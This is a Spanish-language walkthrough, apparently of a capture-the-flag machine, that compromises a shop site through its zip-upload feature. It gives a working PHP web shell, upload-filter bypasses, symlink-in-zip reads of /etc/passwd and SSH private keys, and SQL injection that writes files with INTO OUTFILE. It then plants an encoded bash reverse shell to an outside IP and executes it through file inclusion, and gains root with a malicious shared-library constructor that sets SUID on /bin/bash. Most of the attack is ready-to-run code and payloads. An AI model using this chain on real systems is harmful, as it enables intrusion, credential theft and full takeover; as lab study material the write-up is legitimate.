# The unzipped file must have a .pdf extension

Esta web nos da la posibilidad de subir un archivo **zip**, y una vez subido esta se descomprime para ver su contenido, y ese contenido ha de ser **pdf**. Por otro lado este website cuenta con un apartado de la web que permite cargar páginas web a traves de un parametro que aprovecharemos esta vulenerabilidad para cargar nuestro fichero php una vez lo haymos posicionado en el servidor

Fuente: https://www.youtube.com/watch?v=YVdVKoqeoHs


1. Nos ubicamos en la página donde se ha de subir los ficheros **.zip**


2. Preparamos nuestro fichero php que deseamos subir 
```bash
$cat cmd.php 
<?php
  system($_GET['cmd']);
?>

$ll
total 4,0K
-rw-r--r-- 1 attacker attacker 33 ene 18 13:46 cmd.php
```

## Pruebas de attacker

1. Comprimos en zip nuestro fichero **cmd.php**, y con ello generamos el fichero **cmd.zip**

```bash
$zip cmd.zip cmd.php 
  adding: cmd.php (stored 0%)

$ll
total 8,0K
-rw-r--r-- 1 attacker attacker  33 ene 18 13:46 cmd.php
-rw-r--r-- 1 attacker attacker 197 ene 18 14:00 cmd.zip
```

a.1. Probamos a subir ese fichero **cmd.zip**, y esperamos a ver si se descomprime


2. Si no surgido efecto, podemos intentar el type de fichero. Por ejemplo, podemos poner que es una imagen de tipo GIF

Para ello en la primera linea del fichero cmd.php, añadimos lo siguiente "GIF8;"
```bash
$file cmd.php
cmd.php: PHP script, ASCII text

$vi cmd.php
GIF8;
<ommited...>

$file cmd.php
cmd.php: GIF image data 16188 x 26736
```

3. Podemos probar a cambiar el nombre de cmd.php a cmd.php.pdf y generar el fichero comprimido cmd.zip
```bash
$ mv cmd.php cmd.php.pdf

$zip cmd.zip cmd.php.pdf
  adding: cmd.php (stored 0%)
```

si esta punto nos ha dejado podriamos renombrar el fichero durante la subida con **BurpSuite**
* Primero renombramos el fichero **cmd.php.pdf** por **cmd.phpA.pdf**. 
* Segundo, Interceptamos ese tráfico con Burpsuite, para que durante la subida podamos retocar el nombre fichero sustituyendo el nombre **cmd.phpA.pdf** por **cmd.php .pdf**(A por un espacio en blanco, en hexadecimal seria 00)
* Tercero, cabiamos de **raw** a **hex** y localizamos el nombre **cmd.phpA.pdf**, sustuimos la **A** que en hex es **41** cambiarlo por **[espacio]***, que en hex es **00** 

4. Almacenar en un zip un enlace simbolico que apunte a /etc/passwd

```bash
$ ln -s /etc/passwd test.pdf
$ zip --symlinks cmd.zip test.pdf
```

subimos ese fichero **cmd.zip**, y intentar consultar http://..../test.pdf, seguramente se visualice un fichero pdf sin contenido. Sin embargo en modo **Web Developer Tools** en la pestaña de **network**, click sobre la petición para seleccionarla ir a la pestaña **Response**, ese código extenso debe estar en base64

tras decodificarlo te mostraria el contenido del fichero **/etc/passwd** de esa máquina vulnerable
```bash
$ echo '...' | base64 -d
```

tambien se podria obtener la **private key** del usuario del host vulnerable **/home/<username>/.ssh/id_rsa**, teniendo esa llave podrias acceder por ssh a ese host

5. Continuando con las Pruebas, desde **BurpSuite**, podemos hacer SQLi

quantity=1&product_id=2  200 OK

El codificador tiene **preg_match** como conditional, no podemos saltar esa condicional con los saltos de linea

Fuente: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/php-tricks-esp#preg_match

```
quantity=1&product_id=%0a'--+-2  302 OK
```

A nivel de prompt SQL seria:
```
SELECT * FROM products WHERE id = '
quote> '; select sleep(5)-- -;
```

```
quantity=1&product_id=%0a';select+sleep(5);--+-2  302 OK
```

SQLi, meter cadenas en un fichero del servidor
```
select 'hola' into outfile "/tmp/setensa.txt";

select '<?php system("whoami") ?>' into outfile "/tmp/setensa.php";

quantity=1&product_id=%0a';select+"hola"+into+outfile+'/var/www/html/pwned.txt';--+-2  302 OK

quantity=1&product_id=%0a';select+"hola"+into+outfile+'/tmp/pwned.txt';--+-2  302 OK
```

Se puede crear un enlace simbólico que apunte a ese fichero 
```bash
$ ln -s /tmp/pwned.txt test.pdf
$ zip --symlinks cmd.zip test.pdf
```

Si ha funcionado, deberiamos poder ver el código desde **Developer Tools** como se especifica en el paso **4**

5.1. Dado que MySQL esta trabajando con el usuario **mysql** deberiamos ver en que path tiene permisos ese usuario, para que pueda escribir en ese path
```bash
$ find / -user mysql
```

Por ejemplo tiene permisos en "/var/lib/mysql/"
```
quantity=1&product_id=%0a';select+"hola"+into+outfile+'/var/lib/mysql/pwned.txt';--+-2  302 OK
```

Se puede crear un enlace simbólico que apunte a ese fichero
```bash
$ ln -s /var/lib/mysql/pwned.txt test.pdf
$ zip ---symlinks cmd.zip test.pdf
```

Si ha funcionado, deberiamos poder ver el código desde **Developer Tools** como se especifica en el paso 4


5.2  Crearmos un fichero php con mysql que contiene nuestra reverse shell codificada, para ejecutarlo a traves de la propia URL

Codificamos el oneliner de la Reverse Shell en bash, dos veces para que no salga caracteres especiales
```bash
$ echo 'bash -i &> /dev/tcp/10.10.16.12/443 0>&1' | base64 | base64
WW1GemFDQXRhU0FtUGlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4Tmk0eE1pODBORE1nTUQ0bU1Rbz0K
```

Este es el código php que nos proporcionara el reverse shell cuando se ejecute
```php
echo '<?php system("echo WW1GemFDQXRhU0FtUGlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4Tmk0eE1pODBORE1nTUQ0bU1Rbz0K | base64 -d | base64 -d | bash"); ?>'
```

Códificamos toda la instrucción anterior en base64
```bash
$ echo '<?php system("echo WW1GemFDQXRhU0FtUGlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4Tmk0eE1pODBORE1nTUQ0bU1Rbz0K | base64 -d | base64 -d | bash"); ?>' | base64
PD9waHAgc3lzdGVtKCJlY2hvIFdXMUdlbUZEUVhSaFUwRnRVR2xCZGxwSFZqSk1NMUpxWTBNNGVFMUROSGhOUXpSNFRtazBlRTFwT0RCT1JFMW5UVVEwYlUxUmJ6MEsgfCBiYXNlNjQgLWQgfCBiYXNlNjQgLWQgfCBiYXNoIik7ID8+Cg==
```

Debemos evitar la salida del caracter "+" Aparte de **system**, tambien contamos con funciones similares como es el caso de **exec**. Por ejemplo, podriamos cambiar la **system** por **exec** para evitar que nos salga el signo "+"
```bash
$ echo '<?php exec("echo WW1GemFDQXRhU0FtUGlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4Tmk0eE1pODBORE1nTUQ0bU1Rbz0K | base64 -d | base64 -d | bash"); ?>' | base64
PD9waHAgZXhlYygiZWNobyBXVzFHZW1GRFFYUmhVMEZ0VUdsQmRscEhWakpNTTFKcVkwTTRlRTFETkhoTlF6UjRUbWswZUUxcE9EQk9SRTFuVFVRMGJVMVJiejBLIHwgYmFzZTY0IC1kIHwgYmFzZTY0IC1kIHwgYmFzaCIpOyA/Pgo=
```

Ese código en base64, lo injectamos en BurpSuite para que lo envie
```
quantity=1&product_id=%0a';select+from_base64("PD9waHAgZXhlYygiZWNobyBXVzFHZW1GRFFYUmhVMEZ0VUdsQmRscEhWakpNTTFKcVkwTTRlRTFETkhoTlF6UjRUbWswZUUxcE9EQk9SRTFuVFVRMGJVMVJiejBLIHwgYmFzZTY0IC1kIHwgYmFzZTY0IC1kIHwgYmFzaCIpOyA/Pgo=")+into+outfile+'/var/lib/mysql/pwned.php';--+-2

#302 OK
```

Nos ponemos en escucha por el puerto 443
```bash 
# nc -lnvp 443
```


Ahora apuntamos a ese recurso para que nos cargue la web, no hace falta indicar la extensión
```
http://IP/shop/index.php?page=/var/lib/mysql/pwned&id=2
```

Una vez tengamos la reverse shell, hacemos una tratamiento para hacer una shell interactiva


6. Elevar privilegios a partir de un binario que tenemos disponible para ejectuarlo con privilegios de sudo
```bash
$ sudo -l
(ALL) NOPASSWD: /usr/bin/stock

$ sudo -u root /usr/bin/stock
# Pide password pero del propio binario
```

Imprimir las cadenas imprimibles de un binario, pudiendo llegando a ver las credenciales o comentarios
```bash 
$ strings /usr/bin/stock | grep -i "password"
```

Imaginemos que en el paso anterior ya hemos encontrado las credenciales 

Hacemos un seguimiento a bajo nivel, en la que nos mostrara la ejecucion del binario y nos pedira password
```bash
strace /usr/bin/stock
# Se la localizado lo siguiente, que es de interes
# openat(AT_FDCWD, "/home/rektsu/.config/libcounter.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
```

Esta intentando cargar una so(libreria), verificamos si tenemos capacidad para escribir en ese directory, y si es el caso posicionaremos nuestro SO con cambios para explotar esa vulenerabilidad
```bash
$ cd /home/rektsu/.config
$ touch libcounter.c
```

En la website de **Exploit Database** en **Papers** podemos encontrar un ejemplo de creación de **Shared Object** para generar un fichero que contenga la ejecucion de una orden que deseemos

Fuente:
- https://www.exploit-db.com/papers
- https://www.exploit-db.com/papers/37606

Creamos el fichero **libcounter.c**
```
#include<stdio.h>
#include<stdlib.h>

static void nix_so_injection_poc() __attribute__((constructor));

void nix_so_injection_poc() {
    system("chmod u+s /bin/bash");
}
```

Compilamos nuestro fichero, para generar nuestra libreria **libcounter.so**
```bash
$ gcc -shared -o libcounter.so -fPIC libcounter.c
```

Comprobamos los permisos de **/bin/bash** y tras ejecutar el binary **/usr/bin/stock** verificamos los permisos
```bash
$ ll /bin/bash
-r-xr-xr-x  1 root  wheel  1310224 Sep 16 15:28 /bin/bash
$ sudo /usr/bin/stock
$ ll /bin/bash
-r-sr-xr-x  1 root  wheel  1310224 Sep 16 15:28 /bin/bash
$ bash -p
```
